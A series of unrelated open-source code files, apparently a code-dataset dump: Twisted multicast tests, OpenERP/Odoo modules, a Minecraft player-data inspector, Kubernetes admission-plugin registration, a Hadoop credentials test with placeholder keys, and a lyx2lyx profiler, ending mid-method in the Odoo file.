            self.assertEqual(o.transport.getTTL(), 2)

    def test_loopback(self):
        """
        Test that after loopback mode has been set, multicast packets are
        delivered to their sender.
        """
        # Loopback defaults to on.
        self.assertEqual(self.server.transport.getLoopbackMode(), 1)
        addr = self.server.transport.getHost()
        joined = self.server.transport.joinGroup("225.0.0.250")

        def cbJoined(ignored):
            # With loopback on, the sender should receive its own packet.
            d = self.server.packetReceived = Deferred()
            self.server.transport.write("hello", ("225.0.0.250", addr.port))
            return d
        joined.addCallback(cbJoined)

        def cbPacket(ignored):
            self.assertEqual(len(self.server.packets), 1)
            # Turn loopback off and send again: no packet should arrive.
            self.server.transport.setLoopbackMode(0)
            self.assertEqual(self.server.transport.getLoopbackMode(), 0)
            self.server.transport.write("hello", ("225.0.0.250", addr.port))
            # This is fairly lame: wait one reactor turn and assume any
            # looped-back packet would have been delivered by then.
            d = Deferred()
            reactor.callLater(0, d.callback, None)
            return d
        joined.addCallback(cbPacket)

        def cbNoPacket(ignored):
            # Still only the first packet: loopback-off suppressed delivery.
            self.assertEqual(len(self.server.packets), 1)
        joined.addCallback(cbNoPacket)
        return joined

    def test_interface(self):
        """
        Test C{getOutgoingInterface} and C{setOutgoingInterface}.
        """
        self.assertEqual(
            self.client.transport.getOutgoingInterface(), "0.0.0.0")
        self.assertEqual(
            self.server.transport.getOutgoingInterface(), "0.0.0.0")
        d1 = self.client.transport.setOutgoingInterface("127.0.0.1")
        d2 = self.server.transport.setOutgoingInterface("127.0.0.1")
        result = gatherResults([d1, d2])

        def cbInterfaces(ignored):
            self.assertEqual(
                self.client.transport.getOutgoingInterface(), "127.0.0.1")
            self.assertEqual(
                self.server.transport.getOutgoingInterface(), "127.0.0.1")
        result.addCallback(cbInterfaces)
        return result

    def test_joinLeave(self):
        """
        Test that multicast a group can be joined and left.
        """
        d = self.client.transport.joinGroup("225.0.0.250")

        def clientJoined(ignored):
            return self.client.transport.leaveGroup("225.0.0.250")
        d.addCallback(clientJoined)

        def clientLeft(ignored):
            return self.server.transport.joinGroup("225.0.0.250")
        d.addCallback(clientLeft)

        def serverJoined(ignored):
            return self.server.transport.leaveGroup("225.0.0.250")
        d.addCallback(serverJoined)
        return d

    def test_joinFailure(self):
        """
        Test that an attempt to join an address which is not a multicast
        address fails with L{error.MulticastJoinError}.
        """
        # 127.0.0.1 is not a multicast address, so joining it should fail.
        return self.assertFailure(
            self.client.transport.joinGroup("127.0.0.1"),
            error.MulticastJoinError)
    if runtime.platform.isWindows() and not runtime.platform.isVista():
        test_joinFailure.todo = "Windows' multicast is wonky"

    def test_multicast(self):
        """
        Test that a multicast group can be joined and messages sent to and
        received from it.
        """
        c = Server()
        p = reactor.listenMulticast(0, c)
        addr = self.server.transport.getHost()
        joined = self.server.transport.joinGroup("225.0.0.250")

        def cbJoined(ignored):
            d = self.server.packetReceived = Deferred()
            c.transport.write("hello world", ("225.0.0.250", addr.port))
            return d
        joined.addCallback(cbJoined)

        def cbPacket(ignored):
            self.assertEqual(self.server.packets[0][0], "hello world")
        joined.addCallback(cbPacket)

        def cleanup(passthrough):
            # Stop the extra port created for this test, preserving the
            # incoming result.
            result = maybeDeferred(p.stopListening)
            result.addCallback(lambda ign: passthrough)
            return result
        joined.addCallback(cleanup)
        return joined

    def test_multiListen(self):
        """
        Test that multiple sockets can listen on the same multicast port and
        that they both receive multicast messages directed to that address.
        """
        firstClient = Server()
        firstPort = reactor.listenMulticast(
            0, firstClient, listenMultiple=True)
        portno = firstPort.getHost().port
        secondClient = Server()
        secondPort = reactor.listenMulticast(
            portno, secondClient, listenMultiple=True)
        theGroup = "225.0.0.250"
        joined = gatherResults([self.server.transport.joinGroup(theGroup),
                                firstPort.joinGroup(theGroup),
                                secondPort.joinGroup(theGroup)])

        def serverJoined(ignored):
            d1 = firstClient.packetReceived = Deferred()
            d2 = secondClient.packetReceived = Deferred()
            firstClient.transport.write("hello world", (theGroup, portno))
            return gatherResults([d1, d2])
        joined.addCallback(serverJoined)

        def gotPackets(ignored):
            # Both listeners on the shared port must see the datagram.
            self.assertEqual(firstClient.packets[0][0], "hello world")
            self.assertEqual(secondClient.packets[0][0], "hello world")
        joined.addCallback(gotPackets)

        def cleanup(passthrough):
            # addBoth: stop both ports even when the test failed upstream.
            result = gatherResults([
                maybeDeferred(firstPort.stopListening),
                maybeDeferred(secondPort.stopListening)])
            result.addCallback(lambda ign: passthrough)
            return result
        joined.addBoth(cleanup)
        return joined
    if runtime.platform.isWindows():
        test_multiListen.skip = ("on non-linux platforms it appears multiple "
                                 "processes can listen, but not multiple sockets "
                                 "in same process?")
# Skip entire test classes when the selected reactor does not provide
# the transport interface they exercise.
if not interfaces.IReactorUDP(reactor, None):
    UDPTestCase.skip = "This reactor does not support UDP"
    ReactorShutdownInteraction.skip = "This reactor does not support UDP"
if not interfaces.IReactorMulticast(reactor, None):
    MulticastTestCase.skip = "This reactor does not support multicast"
def checkForLinux22():
    """On Linux 2.2 kernels, mark the multicast interface test as an
    expected failure (``todo``) instead of letting it error out.

    Reads /proc/version and, when the running kernel is 2.2.x, tags
    MulticastTestCase.test_interface with a ``todo`` attribute.
    """
    import os
    if os.path.exists("/proc/version"):
        # Read and close the file instead of leaking the handle.
        version_file = open("/proc/version")
        try:
            s = version_file.read()
        finally:
            version_file.close()
        if s.startswith("Linux version"):
            s = s.split()[2]
            if s.split(".")[:2] == ["2", "2"]:
                # The method is named test_interface; the previous
                # reference to ``testInterface`` raised AttributeError
                # on Linux 2.2 systems.
                f = MulticastTestCase.test_interface.im_func
                f.todo = "figure out why this fails in linux 2.2"
checkForLinux22()
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2010-2012 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Modules (also called addons) management.
"""
from . import db, graph, loading, migration, module, registry
from openerp.modules.loading import load_modules
from openerp.modules.module import get_modules, get_modules_with_version, \
load_information_from_description_file, get_module_resource, get_module_path, \
initialize_sys_path, load_openerp_module, init_module_models, adapt_version
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python3
"""
Very basic player.dat inspection script
"""
import os
import sys
import argparse
from pathlib import Path
# incantation to be able to import overviewer_core
if not hasattr(sys, "frozen"):
    # When running from a source checkout (not a frozen binary), prepend
    # the repository root (parent of this script's directory) to sys.path
    # so that overviewer_core is importable.
    sys.path.insert(0, os.path.abspath(os.path.join(os.path.split(__file__)[0], '..')))
from overviewer_core.nbt import load
from overviewer_core import items
def print_player(data, sub_entry=False):
    """Pretty-print one player's decoded NBT data to stdout.

    :param data: decoded player compound (dict-like NBT data)
    :param sub_entry: when True, prefix every line with a tab and skip
        the per-item inventory listing.
    """
    prefix = "\t" if sub_entry else ""
    print("%sPosition:\t%i, %i, %i\t(dim: %i)"
          % (prefix, data['Pos'][0], data['Pos'][1], data['Pos'][2], data['Dimension']))
    try:
        print("%sSpawn:\t\t%i, %i, %i"
              % (prefix, data['SpawnX'], data['SpawnY'], data['SpawnZ']))
    except KeyError:
        # Players without an explicit spawn point simply have no Spawn line.
        pass
    print("%sHealth:\t%i\tLevel:\t\t%i\t\tGameType:\t%i"
          % (prefix, data['Health'], data['XpLevel'], data['playerGameType']))
    print("%sFood:\t%i\tTotal XP:\t%i"
          % (prefix, data['foodLevel'], data['XpTotal']))
    print("%sInventory: %d items" % (prefix, len(data['Inventory'])))
    if sub_entry:
        return
    for item in data['Inventory']:
        print(" %-3d %s" % (item['Count'], items.id2item(item['id'])))
def find_all_player_files(dir_path):
    """Yield ``(path, player_name)`` for every entry in *dir_path*.

    The player name is the file's stem (filename without extension).
    """
    for entry in dir_path.iterdir():
        yield entry, entry.stem
def find_player_file(dir_path, selected_player):
    """Return ``(path, player_name)`` for *selected_player* in *dir_path*.

    :raises FileNotFoundError: when no matching player file exists.
    """
    for candidate_file, candidate_name in find_all_player_files(dir_path):
        if candidate_name == selected_player:
            return candidate_file, candidate_name
    raise FileNotFoundError()
def load_and_output_player(player_file_path, player, sub_entry=False):
    """Load one player ``.dat`` file and print its contents.

    :param player_file_path: Path to the NBT file.
    :param player: player name used as the heading.
    :param sub_entry: forwarded to print_player (indented output).
    """
    with player_file_path.open('rb') as handle:
        nbt_payload = load(handle)[1]
    print("")
    print(player)
    print_player(nbt_payload, sub_entry=sub_entry)
def dir_or_file(path):
    """argparse ``type=`` callable: accept only an existing file or directory.

    :raises argparse.ArgumentTypeError: when the path exists as neither.
    """
    candidate = Path(path)
    if candidate.is_file() or candidate.is_dir():
        return candidate
    raise argparse.ArgumentTypeError("Not a valid file or directory path")
def main(path, selected_player=None):
    """Inspect player data.

    :param path: a single player ``.dat`` file or a directory of them.
    :param selected_player: when given (directory mode), show only this
        player; otherwise every player found is printed.

    Exits with status 1 when selected_player cannot be found.
    """
    # Bug fix: the original body referenced the module-global ``args``
    # instead of this function's parameters, making it unusable as a
    # library function.
    print("Inspecting %s" % path)
    if not path.is_dir():
        # Single-file mode: derive the player name from the file stem.
        # (The original call passed only one argument, which raised
        # TypeError because load_and_output_player requires a name.)
        load_and_output_player(path, path.stem)
        return
    if selected_player is None:
        for player_file, player in find_all_player_files(path):
            load_and_output_player(player_file, player)
        return
    try:
        player_file, player = find_player_file(path, selected_player)
        load_and_output_player(player_file, player, sub_entry=True)
    except FileNotFoundError:
        print("No %s.dat in %s" % (selected_player, path))
        sys.exit(1)
if __name__ == '__main__':
    # Command line: <Player.dat or directory> [player name]
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument('path', metavar='<Player.dat or directory>', type=dir_or_file)
    parser.add_argument('selected_player', nargs='?', default=None)
    args = parser.parse_args()
    main(args.path, selected_player=args.selected_player)
/*
Copyright 2014 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package options
// This file exists to force the desired plugin implementations to be linked.
// This should probably be part of some configuration fed into the build for a
// given binary target.
import (
"github.com/spf13/pflag"
mutatingadmissionpolicy "k8s.io/apiserver/pkg/admission/plugin/policy/mutating"
validatingadmissionpolicy "k8s.io/apiserver/pkg/admission/plugin/policy/validating"
// Admission policies
"k8s.io/kubernetes/plugin/pkg/admission/admit"
"k8s.io/kubernetes/plugin/pkg/admission/alwayspullimages"
"k8s.io/kubernetes/plugin/pkg/admission/antiaffinity"
certapproval "k8s.io/kubernetes/plugin/pkg/admission/certificates/approval"
"k8s.io/kubernetes/plugin/pkg/admission/certificates/ctbattest"
certsigning "k8s.io/kubernetes/plugin/pkg/admission/certificates/signing"
certsubjectrestriction "k8s.io/kubernetes/plugin/pkg/admission/certificates/subjectrestriction"
"k8s.io/kubernetes/plugin/pkg/admission/defaulttolerationseconds"
"k8s.io/kubernetes/plugin/pkg/admission/deny"
"k8s.io/kubernetes/plugin/pkg/admission/eventratelimit"
"k8s.io/kubernetes/plugin/pkg/admission/extendedresourcetoleration"
"k8s.io/kubernetes/plugin/pkg/admission/gc"
"k8s.io/kubernetes/plugin/pkg/admission/imagepolicy"
"k8s.io/kubernetes/plugin/pkg/admission/limitranger"
"k8s.io/kubernetes/plugin/pkg/admission/namespace/autoprovision"
"k8s.io/kubernetes/plugin/pkg/admission/namespace/exists"
"k8s.io/kubernetes/plugin/pkg/admission/network/defaultingressclass"
"k8s.io/kubernetes/plugin/pkg/admission/network/denyserviceexternalips"
"k8s.io/kubernetes/plugin/pkg/admission/nodedeclaredfeatures"
"k8s.io/kubernetes/plugin/pkg/admission/noderestriction"
"k8s.io/kubernetes/plugin/pkg/admission/nodetaint"
"k8s.io/kubernetes/plugin/pkg/admission/podnodeselector"
"k8s.io/kubernetes/plugin/pkg/admission/podtolerationrestriction"
"k8s.io/kubernetes/plugin/pkg/admission/podtopologylabels"
podpriority "k8s.io/kubernetes/plugin/pkg/admission/priority"
"k8s.io/kubernetes/plugin/pkg/admission/runtimeclass"
"k8s.io/kubernetes/plugin/pkg/admission/security/podsecurity"
"k8s.io/kubernetes/plugin/pkg/admission/serviceaccount"
"k8s.io/kubernetes/plugin/pkg/admission/storage/persistentvolume/resize"
"k8s.io/kubernetes/plugin/pkg/admission/storage/storageclass/setdefault"
"k8s.io/kubernetes/plugin/pkg/admission/storage/storageobjectinuseprotection"
"k8s.io/apimachinery/pkg/util/sets"
"k8s.io/apiserver/pkg/admission"
"k8s.io/apiserver/pkg/admission/plugin/namespace/lifecycle"
"k8s.io/apiserver/pkg/admission/plugin/resourcequota"
mutatingwebhook "k8s.io/apiserver/pkg/admission/plugin/webhook/mutating"
validatingwebhook "k8s.io/apiserver/pkg/admission/plugin/webhook/validating"
)
// AllOrderedPlugins is the list of all the plugins in order.
// This order is the execution order; registration order is irrelevant.
// The webhook, resourcequota, and deny plugins must stay at the end.
var AllOrderedPlugins = []string{
	admit.PluginName,                        // AlwaysAdmit
	autoprovision.PluginName,                // NamespaceAutoProvision
	lifecycle.PluginName,                    // NamespaceLifecycle
	exists.PluginName,                       // NamespaceExists
	antiaffinity.PluginName,                 // LimitPodHardAntiAffinityTopology
	limitranger.PluginName,                  // LimitRanger
	serviceaccount.PluginName,               // ServiceAccount
	noderestriction.PluginName,              // NodeRestriction
	nodetaint.PluginName,                    // TaintNodesByCondition
	alwayspullimages.PluginName,             // AlwaysPullImages
	imagepolicy.PluginName,                  // ImagePolicyWebhook
	podsecurity.PluginName,                  // PodSecurity
	podnodeselector.PluginName,              // PodNodeSelector
	podpriority.PluginName,                  // Priority
	defaulttolerationseconds.PluginName,     // DefaultTolerationSeconds
	podtolerationrestriction.PluginName,     // PodTolerationRestriction
	eventratelimit.PluginName,               // EventRateLimit
	extendedresourcetoleration.PluginName,   // ExtendedResourceToleration
	setdefault.PluginName,                   // DefaultStorageClass
	storageobjectinuseprotection.PluginName, // StorageObjectInUseProtection
	gc.PluginName,                           // OwnerReferencesPermissionEnforcement
	resize.PluginName,                       // PersistentVolumeClaimResize
	runtimeclass.PluginName,                 // RuntimeClass
	certapproval.PluginName,                 // CertificateApproval
	certsigning.PluginName,                  // CertificateSigning
	ctbattest.PluginName,                    // ClusterTrustBundleAttest
	certsubjectrestriction.PluginName,       // CertificateSubjectRestriction
	defaultingressclass.PluginName,          // DefaultIngressClass
	denyserviceexternalips.PluginName,       // DenyServiceExternalIPs
	podtopologylabels.PluginName,            // PodTopologyLabels
	nodedeclaredfeatures.PluginName,         // NodeDeclaredFeatureValidator

	// new admission plugins should generally be inserted above here
	// webhook, resourcequota, and deny plugins must go at the end
	mutatingadmissionpolicy.PluginName,   // MutatingAdmissionPolicy
	mutatingwebhook.PluginName,           // MutatingAdmissionWebhook
	validatingadmissionpolicy.PluginName, // ValidatingAdmissionPolicy
	validatingwebhook.PluginName,         // ValidatingAdmissionWebhook
	resourcequota.PluginName,             // ResourceQuota
	deny.PluginName,                      // AlwaysDeny
}
// registerAllAdmissionPluginFlags registers legacy CLI flag options for admission plugins.
// No new plugins should use CLI flags to configure themselves.
// Currently only DefaultTolerationSeconds still exposes flags.
func registerAllAdmissionPluginFlags(fs *pflag.FlagSet) {
	defaulttolerationseconds.RegisterFlags(fs)
}
// RegisterAllAdmissionPlugins registers all admission plugins.
// The order of registration is irrelevant, see AllOrderedPlugins for execution order.
// Each Register call adds the plugin's factory to the shared plugin registry.
func RegisterAllAdmissionPlugins(plugins *admission.Plugins) {
	admit.Register(plugins) // DEPRECATED as no real meaning
	alwayspullimages.Register(plugins)
	antiaffinity.Register(plugins)
	defaulttolerationseconds.Register(plugins)
	defaultingressclass.Register(plugins)
	denyserviceexternalips.Register(plugins)
	deny.Register(plugins) // DEPRECATED as no real meaning
	eventratelimit.Register(plugins)
	extendedresourcetoleration.Register(plugins)
	gc.Register(plugins)
	imagepolicy.Register(plugins)
	limitranger.Register(plugins)
	autoprovision.Register(plugins)
	exists.Register(plugins)
	noderestriction.Register(plugins)
	nodetaint.Register(plugins)
	podnodeselector.Register(plugins)
	podtolerationrestriction.Register(plugins)
	runtimeclass.Register(plugins)
	resourcequota.Register(plugins)
	podsecurity.Register(plugins)
	podpriority.Register(plugins)
	serviceaccount.Register(plugins)
	setdefault.Register(plugins)
	resize.Register(plugins)
	storageobjectinuseprotection.Register(plugins)
	certapproval.Register(plugins)
	certsigning.Register(plugins)
	ctbattest.Register(plugins)
	certsubjectrestriction.Register(plugins)
	podtopologylabels.Register(plugins)
	nodedeclaredfeatures.Register(plugins)
}
// DefaultOffAdmissionPlugins get admission plugins off by default for kube-apiserver.
// It is computed as the full plugin list (AllOrderedPlugins) minus the
// default-on set enumerated below.
func DefaultOffAdmissionPlugins() sets.Set[string] {
	defaultOnPlugins := sets.New(
		lifecycle.PluginName,                    // NamespaceLifecycle
		limitranger.PluginName,                  // LimitRanger
		serviceaccount.PluginName,               // ServiceAccount
		setdefault.PluginName,                   // DefaultStorageClass
		resize.PluginName,                       // PersistentVolumeClaimResize
		defaulttolerationseconds.PluginName,     // DefaultTolerationSeconds
		mutatingwebhook.PluginName,              // MutatingAdmissionWebhook
		validatingwebhook.PluginName,            // ValidatingAdmissionWebhook
		resourcequota.PluginName,                // ResourceQuota
		storageobjectinuseprotection.PluginName, // StorageObjectInUseProtection
		podpriority.PluginName,                  // Priority
		nodetaint.PluginName,                    // TaintNodesByCondition
		runtimeclass.PluginName,                 // RuntimeClass
		certapproval.PluginName,                 // CertificateApproval
		certsigning.PluginName,                  // CertificateSigning
		ctbattest.PluginName,                    // ClusterTrustBundleAttest
		certsubjectrestriction.PluginName,       // CertificateSubjectRestriction
		defaultingressclass.PluginName,          // DefaultIngressClass
		podsecurity.PluginName,                  // PodSecurity
		podtopologylabels.PluginName,            // PodTopologyLabels, only active when feature gate PodTopologyLabelsAdmission is enabled.
		mutatingadmissionpolicy.PluginName,      // Mutatingadmissionpolicy, only active when feature gate MutatingAdmissionpolicy is enabled
		validatingadmissionpolicy.PluginName,    // ValidatingAdmissionPolicy, only active when feature gate ValidatingAdmissionPolicy is enabled
		nodedeclaredfeatures.PluginName,         // NodeDeclaredFeatureValidator, only active when feature gate NodeDeclaredFeatures is enabled
	)

	return sets.New(AllOrderedPlugins...).Difference(defaultOnPlugins)
}
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.fs.tosfs.object.tos.auth;
import com.volcengine.tos.auth.Credential;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.tosfs.conf.TosKeys;
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.assertEquals;
public class TestSimpleCredentialsProvider extends TestAbstractCredentialsProvider {
@Test
public void testStaticCredentials() {
Configuration conf = new Configuration();
conf.set(TosKeys.FS_TOS_ACCESS_KEY_ID, "ACCESS_KEY");
conf.set(TosKeys.FS_TOS_SECRET_ACCESS_KEY, "SECRET_KEY");
conf.set(TosKeys.FS_TOS_SESSION_TOKEN, "STS_TOKEN");
SimpleCredentialsProvider provider = new SimpleCredentialsProvider();
provider.initialize(conf, "test");
Credential credentials = provider.credential();
assertEquals("ACCESS_KEY", credentials.getAccessKeyId(), "access key must be ACCESS_KEY");
assertEquals("SECRET_KEY", credentials.getAccessKeySecret(), "secret key must be SECRET_KEY");
assertEquals("STS_TOKEN", credentials.getSecurityToken(), "sts token must be STS_TOKEN");
}
@Test
public void testStaticCredentialsWithBucket() {
Configuration conf = new Configuration();
conf.set(TosKeys.FS_TOS_BUCKET_ACCESS_KEY_ID.key("test"), "ACCESS_KEY");
conf.set(TosKeys.FS_TOS_BUCKET_SECRET_ACCESS_KEY.key("test"), "SECRET_KEY");
conf.set(TosKeys.FS_TOS_BUCKET_SESSION_TOKEN.key("test"), "STS_TOKEN");
SimpleCredentialsProvider provider = new SimpleCredentialsProvider();
provider.initialize(conf, "test");
Credential credentials = provider.credential();
assertEquals("ACCESS_KEY", credentials.getAccessKeyId(), "access key must be ACCESS_KEY");
assertEquals("SECRET_KEY", credentials.getAccessKeySecret(), "secret key must be SECRET_KEY");
assertEquals("STS_TOKEN", credentials.getSecurityToken(), "sts token must be STS_TOKEN");
}
@Test
public void testStaticCredentialsWithPriority() {
Configuration conf = new Configuration();
conf.set(TosKeys.FS_TOS_ACCESS_KEY_ID, "ACCESS_KEY");
conf.set(TosKeys.FS_TOS_SECRET_ACCESS_KEY, "SECRET_KEY");
conf.set(TosKeys.FS_TOS_SESSION_TOKEN, "STS_TOKEN");
conf.set(TosKeys.FS_TOS_BUCKET_ACCESS_KEY_ID.key("test"), "ACCESS_KEY_BUCKET");
conf.set(TosKeys.FS_TOS_BUCKET_SECRET_ACCESS_KEY.key("test"), "SECRET_KEY_BUCKET");
conf.set(TosKeys.FS_TOS_BUCKET_SESSION_TOKEN.key("test"), "STS_TOKEN_BUCKET");
SimpleCredentialsProvider provider = new SimpleCredentialsProvider();
provider.initialize(conf, "test");
Credential credentials = provider.credential();
assertEquals("ACCESS_KEY_BUCKET", credentials.getAccessKeyId(),
"access key must be ACCESS_KEY_BUCKET");
assertEquals("SECRET_KEY_BUCKET", credentials.getAccessKeySecret(),
"secret key must be SECRET_KEY_BUCKET");
assertEquals("STS_TOKEN_BUCKET", credentials.getSecurityToken(),
"sts token must be STS_TOKEN_BUCKET");
}
} | java | github | https://github.com/apache/hadoop | hadoop-cloud-storage-project/hadoop-tos/src/test/java/org/apache/hadoop/fs/tosfs/object/tos/auth/TestSimpleCredentialsProvider.java |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2004 José Matos <jamatos@lyx.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# We need all this because lyx2lyx does not have the .py termination
import imp
lyx2lyx = imp.load_source("lyx2lyx", "lyx2lyx", open("lyx2lyx"))
# Profiler used in the study
import hotshot, hotshot.stats
import sys
import os
"""
This program profiles lyx2lyx.
Usage:
./profiling.py option_to_lyx2lyx
Example:
./profiling.py -ou.lyx ../doc/UserGuide.lyx
"""
def main():
    """Run lyx2lyx under the hotshot profiler and print the 20 most
    time-consuming entries, removing the profile file afterwards.
    """
    # This will only work with python >= 2.2, the version where hotshot
    # was added.
    prof = hotshot.Profile("lyx2lyx.prof")  # TODO: use a temporary file?
    try:
        prof.runcall(lyx2lyx.main)
    finally:
        # Always flush/close the profiler, even if lyx2lyx.main raises.
        prof.close()
    try:
        # After the run, show the profile analysis.
        stats = hotshot.stats.load("lyx2lyx.prof")
        stats.strip_dirs()
        stats.sort_stats('time', 'calls')
        stats.print_stats(20)
    finally:
        # Remove the profile data file even when the analysis fails;
        # the original version leaked it on any exception.  The unused
        # ``benchtime`` local was also dropped.
        os.unlink("lyx2lyx.prof")
if __name__ == "__main__":
main() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
'''Define model res.partner.relation'''
##############################################################################
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2013 Therp BV (<http://therp.nl>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import osv, models, fields, api, exceptions, _
from . import get_partner_type
class ResPartnerRelation(models.Model):
    '''Model res.partner.relation is used to describe all links or relations
    between partners in the database.

    In many parts of the code we have to know whether the active partner is
    the left partner, or the right partner. If the active partner is the
    right partner we have to show the inverse name.

    Because the active partner is crucial for the working of partner
    relationships, we make sure on the res.partner model that the partner id
    is set in the context where needed.
    '''
    _name = 'res.partner.relation'
    _description = 'Partner relation'
    # Active relations first, then most recent start/end dates.
    _order = 'active desc, date_start desc, date_end desc'
def _search_any_partner_id(self, operator, value):
return [
'|',
('left_partner_id', operator, value),
('right_partner_id', operator, value),
]
    def _get_computed_fields(
            self, cr, uid, ids, field_names, arg, context=None):
        '''Return a dictionary of dictionaries, with for every partner for
        ids, the computed values.'''
        def get_values(self, dummy_field_names, dummy_arg, context=None):
            '''Get computed values for record'''
            # NOTE(review): ``self`` here is the browse record passed as
            # the first positional argument in the dict comprehension
            # below, not the model — confirm the old/new API shim fills
            # cr/uid for the _on_right_partner call.
            values = {}
            on_right_partner = self._on_right_partner(self.right_partner_id.id)
            # type_selection_id encodes type and side in one integer:
            # type_id * 10, plus 1 when viewed from the right partner.
            values['type_selection_id'] = (
                ((self.type_id.id) * 10) + (on_right_partner and 1 or 0))
            # partner_id_display shows the "other" partner relative to
            # the active one.
            values['partner_id_display'] = (
                self.left_partner_id.id
                if on_right_partner
                else self.right_partner_id.id
            )
            return values
        return dict([
            (i.id, get_values(i, field_names, arg, context=context))
            for i in self.browse(cr, uid, ids, context=context)
        ])
_columns = {
'type_selection_id': osv.fields.function(
_get_computed_fields,
multi="computed_fields",
fnct_inv=lambda *args: None,
type='many2one', obj='res.partner.relation.type.selection',
string='Type',
),
'partner_id_display': osv.fields.function(
_get_computed_fields,
multi="computed_fields",
fnct_inv=lambda *args: None,
type='many2one', obj='res.partner',
string='Partner'
),
}
allow_self = fields.Boolean(related='type_id.allow_self')
left_contact_type = fields.Selection(
lambda s: s.env['res.partner.relation.type']._get_partner_types(),
'Left Partner Type',
compute='_get_partner_type_any',
store=True,
)
right_contact_type = fields.Selection(
lambda s: s.env['res.partner.relation.type']._get_partner_types(),
'Right Partner Type',
compute='_get_partner_type_any',
store=True,
)
any_partner_id = fields.Many2many(
'res.partner',
string='Partner',
compute='_get_partner_type_any',
search='_search_any_partner_id'
)
left_partner_id = fields.Many2one(
'res.partner',
string='Source Partner',
required=True,
auto_join=True,
ondelete='cascade',
)
right_partner_id = fields.Many2one(
'res.partner',
string='Destination Partner',
required=True,
auto_join=True,
ondelete='cascade',
)
type_id = fields.Many2one(
'res.partner.relation.type',
string='Type',
required=True,
auto_join=True,
)
date_start = fields.Date('Starting date')
date_end = fields.Date('Ending date')
active = fields.Boolean('Active', default=True)
    @api.one
    @api.depends('left_partner_id', 'right_partner_id')
    def _get_partner_type_any(self):
        # Recompute the stored contact types of both sides and the
        # non-stored any_partner_id helper (union of both partners).
        self.left_contact_type = get_partner_type(self.left_partner_id)
        self.right_contact_type = get_partner_type(self.right_partner_id)
        self.any_partner_id = self.left_partner_id + self.right_partner_id
    def _on_right_partner(self, cr, uid, right_partner_id, context=None):
        '''Determine wether functions are called in a situation where the
        active partner is the right partner. Default False!
        '''
        # NOTE(review): old-API signature (cr, uid, ...) while callers in
        # _get_computed_fields invoke it on browse records with a single
        # argument — presumably the v8 compatibility layer fills cr/uid/
        # context; confirm before refactoring.
        if (context and 'active_ids' in context and
                right_partner_id in context.get('active_ids', [])):
            return True
        return False
    def _correct_vals(self, vals):
        """Fill type and left and right partner id, according to whether
        we have a normal relation type or an inverse relation type
        """
        vals = vals.copy()
        # If type_selection_id ends in 1, it is a reverse relation type
        if 'type_selection_id' in vals:
            prts_model = self.env['res.partner.relation.type.selection']
            type_selection_id = vals['type_selection_id']
            # Decode the pseudo id back into (real type id, reverse flag).
            (type_id, is_reverse) = (
                prts_model.browse(type_selection_id).
                get_type_from_selection_id()
            )
            vals['type_id'] = type_id
            # The active partner (from context) is the right side for a
            # reverse type, the left side otherwise.
            if self._context.get('active_id'):
                if is_reverse:
                    vals['right_partner_id'] = self._context['active_id']
                else:
                    vals['left_partner_id'] = self._context['active_id']
            # The displayed partner is the "other" side.
            if vals.get('partner_id_display'):
                if is_reverse:
                    vals['left_partner_id'] = vals['partner_id_display']
                else:
                    vals['right_partner_id'] = vals['partner_id_display']
            # other_partner_id is a transient UI key: map it to the
            # proper side and drop it before the ORM sees it.
            if vals.get('other_partner_id'):
                if is_reverse:
                    vals['left_partner_id'] = vals['other_partner_id']
                else:
                    vals['right_partner_id'] = vals['other_partner_id']
                del vals['other_partner_id']
        # contact_type is UI-only as well; never store it.
